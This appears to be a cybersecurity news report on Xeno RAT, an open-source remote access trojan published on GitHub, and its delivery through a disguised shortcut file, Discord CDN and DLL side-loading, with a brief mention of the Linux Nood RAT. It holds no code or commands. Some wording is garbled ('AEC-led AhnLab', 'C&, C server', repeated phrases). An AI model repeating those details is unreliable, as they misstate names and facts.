Xeno RAT, an “intricately designed” remote access trojan, has been made freely available on GitHub for other actors.
The open-source RAT, which was written in C# and is compatible with Windows 10 and Windows 11, has a” comprehensive set of features for remote system management,” according to its creator, who goes by the name moom825.
A hidden virtual network computing ( hVNC ) module similar to DarkVNC, which enables attackers to gain remote access to an infected computer, is included in the package, along with a SOCKS5 reverse proxy, real-time audio recording, and access to real-time audio recording.
The project’s developer states that” Xeno RAT was created entirely from scratch, guaranteeing a distinctive and personalized approach to remote access tools.” Another important feature is that it has a builder that makes it possible to create individual malware variants.
The moom825 is also the author of another C#-based RAT called DiscordRAT 2.0, which was distributed by threat actors within a malicious npm package called node-hide-console-windows, as disclosed by ReversingLabs in October 2023.
In a report released last week, cybersecurity firm Cyfirma claimed to have witnessed Xeno RAT being distributed through the Discord content delivery network ( CDN), again highlighting how more campaigns utilizing RATs are being conducted in response to the rise in affordable and freely available malware.
The company claims that the company’s main vector, which is a shortcut file disguised as a WhatsApp screenshot, acts as a downloader. The downloader extracts and executes the next stage payload after disassembling the ZIP archive from DiscordCDN.
The multi-stage sequence uses a technique known as DLL side-loading to launch a malicious DLL while establishing persistence and avoiding detection and analysis.
The development comes as an AEC-led AhnLab Security Intelligence Center revealed the use of a Gh0st RAT variant known as Nood RAT, which is used in attacks against Linux systems and enables adversaries to obtain sensitive information.
A backdoor malware called Nood RAT can be used to execute commands from the C&, C server to perform malicious tasks like downloading malicious files, stealing system internal files, and even executing commands, according to ASEC.
It has the encryption feature to prevent network packet detection and can be used by threat actors to carry out multiple malicious activities, it claims.